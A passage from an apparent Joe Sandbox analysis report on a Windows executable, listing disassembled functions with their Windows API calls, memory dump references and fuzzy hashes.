                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 37d5df8bbcbb20448d8c6b119ba718f0b76b949bf69794669a362dc59177b46d
                • Instruction ID: 23b22720973af1e47828899e3d3bdb2fdee52546743bfe0e0bf9a122f250fce8
                • Opcode Fuzzy Hash: 37d5df8bbcbb20448d8c6b119ba718f0b76b949bf69794669a362dc59177b46d
                • Instruction Fuzzy Hash: 9201C4313042299B8B08CE69AC9497EB399FFC5731B14C62DF99AC7294CB31D805AB21
                Function 00879E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00879E76
                • GetLastError.KERNEL32 ref: 00879E82
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 504c4af7a69332a06df35f883a93bb5e344edf8f57f41111d55a271dcdbf3459
                • Instruction ID: de7044ea1a6a97c3a44b528190d03b5aa63f7c6b082b576d449f68dd1c65de4e
                • Opcode Fuzzy Hash: 504c4af7a69332a06df35f883a93bb5e344edf8f57f41111d55a271dcdbf3459
                • Instruction Fuzzy Hash: 430192723046045BEB34DE69DC48B6BB6D9FB85328F14893DF18AC2684DAB5EC488711
                Function 00898606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00898627
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,008B0F50,0087CE57,?,?,?,?,?,?), ref: 00898663
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: d7ea92702ff12d870f3baa7ce40c65ddb7f96b6572e65bf39e42270e43ab2060
                • Instruction ID: 5649f756b3930115d3c627aa8395f138744804980bfd1bc196d24474c46ccb08
                • Opcode Fuzzy Hash: d7ea92702ff12d870f3baa7ce40c65ddb7f96b6572e65bf39e42270e43ab2060
                • Instruction Fuzzy Hash: D1F06232205117E6DF223A29AC08F6B3758FFB37A4F2D4116F854DE191DF20D80195A6
                Function 008979B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0089B610: GetEnvironmentStringsW.KERNEL32 ref: 0089B619
                  • Part of subcall function 0089B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089B63C
                  • Part of subcall function 0089B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089B662
                  • Part of subcall function 0089B610: _free.LIBCMT ref: 0089B675
                  • Part of subcall function 0089B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089B684
                • _free.LIBCMT ref: 008979FD
                • _free.LIBCMT ref: 00897A04
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 400815659-0
                • Opcode ID: 0a4f27b0b8e64af6c88e11727efd8e68d7f9d6a4a4348c1270991dc10529eda0
                • Instruction ID: 859c8abf5bebe67b0a170d28fc1bf29bb087e06125efbf1bbffcaf2a5c3b6dc6
                • Opcode Fuzzy Hash: 0a4f27b0b8e64af6c88e11727efd8e68d7f9d6a4a4348c1270991dc10529eda0
                • Instruction Fuzzy Hash: 75E0ED12A1D41611DF62B2BE3D0666F0B44FF82330B2D0B2BF521EB9C2DE148802009B
                Function 00880908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 00880915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 0088091C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 039303f0e0d2b6055acc9c56512144c96e7157723ecd6d6811900c4df5f19f72
                • Instruction ID: 600cbb8ae1f4013b4fc05049c74827b802f3ed3da3b3f36a50248881ae199ded
                • Opcode Fuzzy Hash: 039303f0e0d2b6055acc9c56512144c96e7157723ecd6d6811900c4df5f19f72
                • Instruction Fuzzy Hash: 32E09233A1150ABB7F49EAB49C048BB7B9DFB052147214179F806D7601F930DE098FA0
                Function 0087A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A489
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6e691eda041c1a5a1b2fc2aacc50639176f455b9afa3338fbd3b5d0903bbdb0e
                • Instruction ID: 7b07fab619c72db1a809122248c185df3a38c6a914bad074f952b04f65fc0e1c
                • Opcode Fuzzy Hash: 6e691eda041c1a5a1b2fc2aacc50639176f455b9afa3338fbd3b5d0903bbdb0e
                • Instruction Fuzzy Hash: 6DF08C312402097BEB016E60DC05BDA776CFB05385F04C051BC8CE6165DB72DAA8AB51
                Function 0088D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: 5676294d3c7c94667883471ea092b6b63dda521e9a108b72387737fb2ce9c088
                • Instruction ID: 49af1f9fb6dfabe4e29049d45e556095c74349167c9ab7575baf48fb63b054b1
                • Opcode Fuzzy Hash: 5676294d3c7c94667883471ea092b6b63dda521e9a108b72387737fb2ce9c088
                • Instruction Fuzzy Hash: E1F0A071504348AAEB21BBB49C06FAA3B5DFB04745F044696B604D30B2DA71BA608762
                Function 0087A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                Download Yara Rule
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,0087984C,?,?,00879688,?,?,?,?,008A1FA1,000000FF), ref: 0087A13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0087984C,?,?,00879688,?,?,?,?,008A1FA1,000000FF), ref: 0087A16C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: bc432081496030675d99d4e8a650e7de1e5eeb97392037e2c8e9b3868f728961
                • Instruction ID: c6b8a276c8a40d4f69e695ab93c6c80c1c3b5712b49058aca7bdb35ee9ffa097
                • Opcode Fuzzy Hash: bc432081496030675d99d4e8a650e7de1e5eeb97392037e2c8e9b3868f728961
                • Instruction Fuzzy Hash: CAE092356402086BEB11AF64DC41FEA775CFB09381F888065B988D3164DB61DD94AFA1
                Function 0088A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                Download Yara Rule
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,008A1FA1,000000FF), ref: 0088A3D1
                • OleUninitialize.OLE32(?,?,?,?,008A1FA1,000000FF), ref: 0088A3D6
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 161dd7f394702049483b1cde4c6e98fe65dc5bcc407ebd49e3e3fa19119940de
                • Instruction ID: 323e10f5b12eef76b97bfd886a869da53ed585adcb0ef009c01816a23717ee1d
                • Opcode Fuzzy Hash: 161dd7f394702049483b1cde4c6e98fe65dc5bcc407ebd49e3e3fa19119940de
                • Instruction Fuzzy Hash: E7F03932658655EFCB10AB4CDC05B59FBACFB89B20F04436AF419C3B60CB786800CA91
                Function 0087A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,0087A189,?,008776B2,?,?,?,?), ref: 0087A1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0087A189,?,008776B2,?,?,?,?), ref: 0087A1D1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: fae5c582ad5f9b3006e1bb310f841559cdefc6b4242ea148310bb3cff5f66169
                • Instruction ID: 40ffcb242d191edc0f25960f1e195000917bddc8dc12ae1c00f5a0886295cc3e
                • Opcode Fuzzy Hash: fae5c582ad5f9b3006e1bb310f841559cdefc6b4242ea148310bb3cff5f66169
                • Instruction Fuzzy Hash: EFE0D8355001285BDB20EB68DC05BD9B75CFB093E1F0082A1FD49E36A4D770DD449BE1
                Function 00880085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                Download Yara Rule
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 6165037fc5b80f877d61393d1e201798fff692b4c7123a25902476f37eff1cc0
                • Instruction ID: 8ea1b63bafd3ea895ae92db37cf4173a6121e0130870f26da4b7884f5b5010fc
                • Opcode Fuzzy Hash: 6165037fc5b80f877d61393d1e201798fff692b4c7123a25902476f37eff1cc0
                • Instruction Fuzzy Hash: 89E0127690151C6ADB21AAA49C05FD6B76CFF0A382F0400A5BA48D3114DA74DA44CBA1
                Function 00889B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00889B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00889B37
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: e6a6a3fab4069be66a0e1ec6af60b1cd3c2fa70920b6633d7adceeb4b8c9435a
                • Instruction ID: b1c436ddc9ae0a890a42f05ff9a7ff1755d2dc9aeab070a7326a1f8a0481f1f6
                • Opcode Fuzzy Hash: e6a6a3fab4069be66a0e1ec6af60b1cd3c2fa70920b6633d7adceeb4b8c9435a
                • Instruction Fuzzy Hash: CEE0ED71901219EFDB10EF98D9017AAB7E8FB05321F20805BF899D3600D7B16E04AB91
                Function 0089215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0089329A: try_get_function.LIBVCRUNTIME ref: 008932AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0089217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00892185
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: aaa2af39e111db727d8f5e4a7749c21bc05f5f49defee5e51a9ac676c7fec898
                • Instruction ID: 6a39e10c1337ac521910ded172d837cc8ea33b189276895a8f9254f2a0aa826b
                • Opcode Fuzzy Hash: aaa2af39e111db727d8f5e4a7749c21bc05f5f49defee5e51a9ac676c7fec898
                • Instruction Fuzzy Hash: 4DD0A92824470638BC0837B8285A0A83348F862BB43E80B86E230CA2D2EE14A424A113
                Function 0088DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • DloadLock.DELAYIMP ref: 0088DC73
                • DloadProtectSection.DELAYIMP ref: 0088DC8F
                  • Part of subcall function 0088DE67: DloadObtainSection.DELAYIMP ref: 0088DE77
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: 7d0ea133ba0fded73e23ca854802ce825e8d65880c3480547403b6cb9f81e2ce
                • Instruction ID: 51c93a86f9b8777d9537054c6733857d9824ee763ed5b00a526dad471753ad9a
                • Opcode Fuzzy Hash: 7d0ea133ba0fded73e23ca854802ce825e8d65880c3480547403b6cb9f81e2ce
                • Instruction Fuzzy Hash: EDD012B0520300AAD611FB28A98671C33B1F704788FA80702F206C7AE0DFF85C80DB06
                Function 008712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 4a4c54ba779860d88c1a65dbade18d9de169a333b53a240103477891876535ac
                • Instruction ID: f8eb0b7d0aeb1e646819fb07733d72980a9f1ca488abc075d71297f490ba9976
                • Opcode Fuzzy Hash: 4a4c54ba779860d88c1a65dbade18d9de169a333b53a240103477891876535ac
                • Instruction Fuzzy Hash: 39C01232058201BECF020BB0DC09D2FBBA8BBA5212F05CA0AB2A5C0060C238C010DB11
                Function 008719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 134a104da001a38b7dbd0f36d5f81736b2700a0c46bf8c3de6ba4709016ac555
                • Instruction ID: 7eba037839a326032daa89cde6088d3727b90075a57f7344cff4c2f835ae7a57
                • Opcode Fuzzy Hash: 134a104da001a38b7dbd0f36d5f81736b2700a0c46bf8c3de6ba4709016ac555
                • Instruction Fuzzy Hash: 0FC1A430A042549FEF15CF6CC489BA97BA5FF46314F0880B9EC49DB69ADB31D944CB61
                Function 00873B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
